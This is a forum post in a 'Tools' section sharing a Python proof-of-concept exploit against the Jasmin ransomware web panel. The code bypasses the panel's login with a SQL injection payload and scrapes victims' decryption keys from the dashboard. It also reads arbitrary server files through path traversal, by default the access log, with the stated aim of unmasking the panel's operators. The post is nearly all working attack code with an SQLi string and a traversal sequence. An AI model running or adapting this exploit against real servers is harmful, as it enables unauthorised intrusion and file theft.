Jasmin Ransomware Panel - SQLi + LFI

Tools
Post Reply
User avatar
ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Jasmin Ransomware Panel - SQLi + LFI

Postby ltx_Lazzarus » Sun May 05, 2024 6:15 am

https://github.com/chebuya/CVE-2024-308 ... versal-poc

Code: Select all

import requests
import argparse
import os
from bs4 import BeautifulSoup

def get_file(jasmin_url, filepath):
    response = requests.get(
        f'{jasmin_url}/download_file.php?file={filepath}',
        allow_redirects=False
    )

    return response.text


def get_keys(jasmin_url):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }

    data = "username=&password='+or+1%3D1+--+-&service=login"
    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)
    cookies = login_req.cookies

    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)
    soup = BeautifulSoup(list_req.text, 'html.parser')

    rows = soup.find_all('tr')

    print(f"Dumping decryption keys from {len(rows)-1} victims")
    for row in rows:
        data = row.find_all('td')
        if len(data) == 0:
            continue
       
        username = data[1].get_text()
        hostname = data[0].get_text()
        filepath = data[7].find('a')['href'].split("=")[1]

        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")


parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")
subparser = parser.add_subparsers(dest='subcommand')

file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (//target_server)")
file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!

keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (//target_server)")

args = parser.parse_args()

if args.subcommand != None:
    target_url = args.url.rstrip("/")

if args.subcommand == "getkeys":
    get_keys(target_url)
elif args.subcommand == "getfile":
    target_file = args.file.replace("\\", "/").replace("c:", "")
    target_path = os.path.join("../../../../../../../../../", target_file)
    print(get_file(target_url, target_path))
else:
    parser.print_help()
stopthe4ttack.box
Top
Post Reply

Return to “Tools”